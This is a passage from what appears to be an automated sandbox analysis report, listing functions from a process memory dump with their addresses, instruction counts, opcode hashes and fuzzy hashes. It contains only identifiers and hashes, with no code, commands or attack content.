                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dd5f5a4b70b5aa24ff437fee1e7979db41269df16d2cea7de9dcc060d7fdaad8
                  • Instruction ID: 445d76a0bd3555df708787bbfb3791d93d4451200cdbd0bb5f7341b912a2f832
                  • Opcode Fuzzy Hash: dd5f5a4b70b5aa24ff437fee1e7979db41269df16d2cea7de9dcc060d7fdaad8
                  • Instruction Fuzzy Hash: 56E16C71E1965D8FEBA8DBA8C4A47B8B7A1FF58301F4540BED05ED72E2CA756940CB00
                  Function 00007FFD9BA11718 Relevance: .3, Instructions: 292COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 595ade9e22e9958f53db2e5926c12f1454d22247ca2e73592fff857b0ad765fd
                  • Instruction ID: 8c6e8134cd8cdedcdea09ca9bb411f62f6dc76414da184542e39f81906c9b7d2
                  • Opcode Fuzzy Hash: 595ade9e22e9958f53db2e5926c12f1454d22247ca2e73592fff857b0ad765fd
                  • Instruction Fuzzy Hash: 8791EF31B1DA4D4BDB98DF5C88606B977E2EFA8300B1541BAE45EC32D2DE31AD02C781
                  Function 00007FFD9BA106C0 Relevance: .2, Instructions: 226COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: df2e6942f01d9086e61656e722c1ed930cedd636727208f51d70d33b0132d58e
                  • Instruction ID: d72d3660e3d24b4d7d8167cbf63c9e8af5ab906b79f9a79a8d13044e19e9a6c5
                  • Opcode Fuzzy Hash: df2e6942f01d9086e61656e722c1ed930cedd636727208f51d70d33b0132d58e
                  • Instruction Fuzzy Hash: 6A616953B0FACA0FF77157AC68644B53B90EF9275070A92F7D0A8870FBEC55A9058385
                  Function 00007FFD9BA13291 Relevance: .2, Instructions: 177COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 632af5f3654e96f336b7569f11d57a1871cc0d953fe2582f3792098ac627b542
                  • Instruction ID: fb9f5c3b8d33f3bb1c041909fe2c45569c68ee46e46d9b0835c3fe5ba3c970ac
                  • Opcode Fuzzy Hash: 632af5f3654e96f336b7569f11d57a1871cc0d953fe2582f3792098ac627b542
                  • Instruction Fuzzy Hash: A6515C70E0961D9FEBA4EFA8C4646EDB7F1EF54301F115079D009E72A1CB786944CB50
                  Function 00007FFD9BA1C299 Relevance: .2, Instructions: 171COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fe62fcffbcb34f41c74288f9a5a8bedb721c833fba8928bd7673782ec91c6e6c
                  • Instruction ID: 9c48393c95632a2160cb29bfe87b68ec6ab94e7338ef24cbcc86b6dbfdbe7e7a
                  • Opcode Fuzzy Hash: fe62fcffbcb34f41c74288f9a5a8bedb721c833fba8928bd7673782ec91c6e6c
                  • Instruction Fuzzy Hash: E5514E70E0D61D8FEBA4EBA8C4A57EDB7F1EF59300F11507AD00DE7292DA78A9418B40
                  Function 00007FFD9BA1B05A Relevance: .2, Instructions: 151COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b8134d8d667bf9df33134c962dd89a6d05b6072c38d33606ecaa7ea67de042c7
                  • Instruction ID: a71915831c1793dc39347c13ffdcb8013afdb40e278fd45a02769215f80c31a1
                  • Opcode Fuzzy Hash: b8134d8d667bf9df33134c962dd89a6d05b6072c38d33606ecaa7ea67de042c7
                  • Instruction Fuzzy Hash: 78414762F0E54E5FE7A1EBA8C8A96F977E0FF15310F4644B7D068C70A6EE64A504C341
                  Function 00007FFD9BA1BE19 Relevance: .1, Instructions: 139COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cc08400ab1d00a135ba7f066b703dcdf7f0932983870cf6da1beaabf7e4eb079
                  • Instruction ID: 029788ee156b93d5a26183c2dc304847311c04922bda31875f8c663223e25316
                  • Opcode Fuzzy Hash: cc08400ab1d00a135ba7f066b703dcdf7f0932983870cf6da1beaabf7e4eb079
                  • Instruction Fuzzy Hash: 97510870E0A61D8FDBA4DFA4D4A46ED77F1EF18300F51107AE019E72A2DB78AA44CB50
                  Function 00007FFD9BA1C342 Relevance: .1, Instructions: 110COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b82d980743b6ea4aa0678639d6251c634f34516478f83e11a4b18584b5eb27f4
                  • Instruction ID: 91111be3a475bc710387c2d54a25c3c54e53a06bd7f65e5e8a36175121877f10
                  • Opcode Fuzzy Hash: b82d980743b6ea4aa0678639d6251c634f34516478f83e11a4b18584b5eb27f4
                  • Instruction Fuzzy Hash: D731E575E0D91D8EEBE4EBA894A57FCB7B1FF58300F512079D00DE7292DE6869428B40
                  Function 00007FFD9BA1C3BA Relevance: .1, Instructions: 100COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a2b183d77d53dfd781c86b98606d698ad952cc044153d3d3185bd75d361e79cc
                  • Instruction ID: 71a7a8ba148273fbc3345f568fc873b5a79f54ef9f15e92b108d227d269c53cf
                  • Opcode Fuzzy Hash: a2b183d77d53dfd781c86b98606d698ad952cc044153d3d3185bd75d361e79cc
                  • Instruction Fuzzy Hash: D031B875E0D91D8EEBE4EB9894A57FCBBB1EF58300F512039D00DE7292DE6869418B40
                  Function 00007FFD9BA10805 Relevance: .1, Instructions: 85COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1940472a520a46f5e70590e218e29b4af6d604c90233fa3bc4e6155f38ab5e7f
                  • Instruction ID: d0b9f3ba695510e065d626d8abd815a0f1c535578c84956f332d7e4d77dc4a87
                  • Opcode Fuzzy Hash: 1940472a520a46f5e70590e218e29b4af6d604c90233fa3bc4e6155f38ab5e7f
                  • Instruction Fuzzy Hash: A4218B52B0F18B97E76137BC98B95E93B90FF11318B0A41B3E4A9CA0D3DD18A159C2C5
                  Function 00007FFD9BA1A711 Relevance: .1, Instructions: 75COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f50093ead18b3bc726dec4582162429e3e5a9fe6b3a46216c4383c9595a65bb5
                  • Instruction ID: aafb1ad64ea34c269b1db4843f190eeaa01efa8e4d82419b5d895c92f468ab83
                  • Opcode Fuzzy Hash: f50093ead18b3bc726dec4582162429e3e5a9fe6b3a46216c4383c9595a65bb5
                  • Instruction Fuzzy Hash: 5721813090864D8FDB84EF68C855AA93BF0FF1C305F01056AE85DC7265DB70E540CB80
                  Function 00007FFD9BA10A01 Relevance: .1, Instructions: 69COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4d2cfce47ba2a9a94ef41c2411e72874014788e4ed103da80d1cac9bc4bb7fbe
                  • Instruction ID: 08887ec2eb7e8ed07841963b64c41666f91488efe8f9b7ed4a9ebe0bd979b971
                  • Opcode Fuzzy Hash: 4d2cfce47ba2a9a94ef41c2411e72874014788e4ed103da80d1cac9bc4bb7fbe
                  • Instruction Fuzzy Hash: 7D11C130E0E50E4FEBA0EBA8C8695FE7BE1FF58710F4655B6D459C30A6EE74A6408740
                  Function 00007FFD9BA1B2D8 Relevance: .1, Instructions: 68COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: add774f49dc9a3282d01d8e4b4da49c902589c7c7d993b174a5a248b5cffd1da
                  • Instruction ID: bd39f996886c48cd03d98bb591466960d116421a21cbd4d447ed2fe72f0177c9
                  • Opcode Fuzzy Hash: add774f49dc9a3282d01d8e4b4da49c902589c7c7d993b174a5a248b5cffd1da
                  • Instruction Fuzzy Hash: BB219D30E0E61E8EFBA0EBA4C4546FE76E1EF48300F565576D019931E5DFB8A6988B40
                  Function 00007FFD9BA1CAE0 Relevance: .1, Instructions: 59COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c47dfd78cbb0d5c8ee4c3999269ff625efdc1f1a8779be2e917e8e7ec6aace49
                  • Instruction ID: d63621fe4d692a9390c126a03c7e64c69922653c8f94692c3a4668f026c7eb57
                  • Opcode Fuzzy Hash: c47dfd78cbb0d5c8ee4c3999269ff625efdc1f1a8779be2e917e8e7ec6aace49
                  • Instruction Fuzzy Hash: 30118630A0E64E4FDB96EB68C8A95B97BB0FF15300F0504BBD459CB0A2EE796A44C740
                  Function 00007FFD9BA1CED0 Relevance: .1, Instructions: 57COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8425b31041a682e6d95aeab6a3ae4a610a120c6b96bf1e460644be89e5b05052
                  • Instruction ID: 2ea060a08fd2ac001a2134d814eba49dae6af7f989dc3f601c8eb18ecc83aae8
                  • Opcode Fuzzy Hash: 8425b31041a682e6d95aeab6a3ae4a610a120c6b96bf1e460644be89e5b05052
                  • Instruction Fuzzy Hash: DA119130A0990E9EEBA8EF68C4696BE77E1FF18304F10057ED41EC21E5DE75AA44C740
                  Function 00007FFD9BA1C609 Relevance: .1, Instructions: 54COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bcecc3565a5de7b1a392716dff33dc13cd50b00abfe78f8262932d00e9417bbb
                  • Instruction ID: 320afd7f5234b5826e1d7b306f81710bf01e63320e501e01f2df3f9fc045c36f
                  • Opcode Fuzzy Hash: bcecc3565a5de7b1a392716dff33dc13cd50b00abfe78f8262932d00e9417bbb
                  • Instruction Fuzzy Hash: 54110230A0E68E8FDB99EF64C4A51B93FA0FF59300F0120BED019CA0A2DA79A640C740
                  Function 00007FFD9BA12F11 Relevance: .1, Instructions: 53COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ccf7ceabecf39ef4e3d8053aa3e0176bdf11263e507b3c0fd13c0eb0b3cf22e5
                  • Instruction ID: dda8ce46e190816e5ebc5f5bbf14645127bb5504ddbcf576dc65b4bc88226100
                  • Opcode Fuzzy Hash: ccf7ceabecf39ef4e3d8053aa3e0176bdf11263e507b3c0fd13c0eb0b3cf22e5
                  • Instruction Fuzzy Hash: 5901D870E0A60E4FE791ABB4C4595A977E0FF15304F0656B6D418C20B5DE74E2548700
                  Function 00007FFD9BA1C219 Relevance: .1, Instructions: 52COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c4ab69c97932fc5139309058ca3333d113f69b21c5c571a86c9c3709ceec034f
                  • Instruction ID: 0a066387e63879e38da052339a1bab243184c2c80a110aabfc4da9d932445038
                  • Opcode Fuzzy Hash: c4ab69c97932fc5139309058ca3333d113f69b21c5c571a86c9c3709ceec034f
                  • Instruction Fuzzy Hash: 4111A330A0964D4FDB95EBA8C4A91B97BB0FF19300F0505BED459C71A2DB799644C740
                  Function 00007FFD9BA1D79D Relevance: .0, Instructions: 50COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d7c2613ae5d87d008f1b4bfd3f97b044bd502218ba5dd295858338acff01b52e
                  • Instruction ID: bff7c74e2e1efa7e81f115253ce5f2947e8e78e50df93f0431b2936a419c86b3
                  • Opcode Fuzzy Hash: d7c2613ae5d87d008f1b4bfd3f97b044bd502218ba5dd295858338acff01b52e
                  • Instruction Fuzzy Hash: A3116D30A0964E8FDBA8EF68C4696FD7BE0FF18304F5105BED42AC65A1DB75A650C740
                  Function 00007FFD9BA1AC59 Relevance: .0, Instructions: 46COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7bf60c152b2ff9162c09a43bfe71da2e149cd25060054b4ee6639edd7eede3ef
                  • Instruction ID: 42a1fd6c0550283b7b756a77ffb3e9e15d57ef4fd89f1b7b57a9e4503b34f726
                  • Opcode Fuzzy Hash: 7bf60c152b2ff9162c09a43bfe71da2e149cd25060054b4ee6639edd7eede3ef
                  • Instruction Fuzzy Hash: 7C01D830A0F24D4FD7A2EBB8C4695A93BE0EF15300F4614F6D058C70B2DA74A5448701
                  Function 00007FFD9BA12F89 Relevance: .0, Instructions: 43COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5d16e69b504af59299e35ff973c02e3142915f7342ba62c69bd2088626239b7d
                  • Instruction ID: d64670dc213874732924196431e3e960e9212885417fa49cbfefc6dbefd963a8
                  • Opcode Fuzzy Hash: 5d16e69b504af59299e35ff973c02e3142915f7342ba62c69bd2088626239b7d
                  • Instruction Fuzzy Hash: AB01D870A0E74D4FE791A7B488695A97FE0EF05304F0614F6D449C70B6DA78E5648301
                  Function 00007FFD9BA10610 Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5af76fb6e4efb56a3b6a2c6cac2687efb4b1867601e953cd3dfa389270787b02
                  • Instruction ID: 3331c8f96274e0d767b4cfed7a2c810856efd72b5eb1b26225ef58f3d827ac1b
                  • Opcode Fuzzy Hash: 5af76fb6e4efb56a3b6a2c6cac2687efb4b1867601e953cd3dfa389270787b02
                  • Instruction Fuzzy Hash: 78016230A1960E8AEB98EBA4C4685B973A0FF58309F11147EE41EC21E5DF75E650C700
                  Function 00007FFD9BA10608 Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0bfcf1dba51e30b9f66d90e2eea3f53f500f84007d846622803d6671b29e577b
                  • Instruction ID: 86d2f720ce8802973218eb826a5b267d76927daa8107ee14fb2c9720d7f9ba6d
                  • Opcode Fuzzy Hash: 0bfcf1dba51e30b9f66d90e2eea3f53f500f84007d846622803d6671b29e577b
                  • Instruction Fuzzy Hash: 68016230A1560E8BEB99EFA4C4696BD73A1FF18309F11187ED41EC21E5DE75E250C600
                  Function 00007FFD9BA10FB4 Relevance: .0, Instructions: 37COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 53bcaa8ea9cadcc310871c092a10b11dc1adf1bba0e10b731fae19b785843bdf
                  • Instruction ID: f7b9e60fb7a0976c3513e5d2a6967ce65b252698a110f78a14bae57ba78423a9
                  • Opcode Fuzzy Hash: 53bcaa8ea9cadcc310871c092a10b11dc1adf1bba0e10b731fae19b785843bdf
                  • Instruction Fuzzy Hash: D0011D30F0550E8BEB60EB58C890AEEB3B1EB54311F1181B6D419E7294DE75AE44CF84
                  Function 00007FFD9BA12809 Relevance: .0, Instructions: 36COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 039302d68edd41eb5b3b7b66621263b8221b2afc6b497b8c390a58bc1f529f38
                  • Instruction ID: ef536e20907435eade4cb9562d6ca5f1ce3e862e9208ce0a7bcf21cf37bdcff0
                  • Opcode Fuzzy Hash: 039302d68edd41eb5b3b7b66621263b8221b2afc6b497b8c390a58bc1f529f38
                  • Instruction Fuzzy Hash: 3EF0AF3090E38D8FEBAA9F7488252A93B60EF56204F4614FAD449C60E2DA68D548C701
                  Function 00007FFD9BA1B37F Relevance: .0, Instructions: 36COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000001A.00000002.1842558578.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_26_2_7ffd9ba10000_OjTEkrTlLyhdt.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b8e313ea1895f7710021beb8c4925d2a28fd76f9f8db9d31f15c490b50e79e6a
                  • Instruction ID: 3873bfbb85dfe13b03d3a023f761aaa94ea0d6cc3018e504db8574d14ebda609
                  • Opcode Fuzzy Hash: b8e313ea1895f7710021beb8c4925d2a28fd76f9f8db9d31f15c490b50e79e6a
                  • Instruction Fuzzy Hash: 50017170E0961E8FDB64DF90C490AFEB3B1EF54300F505676C409A2295DF78AA85DB80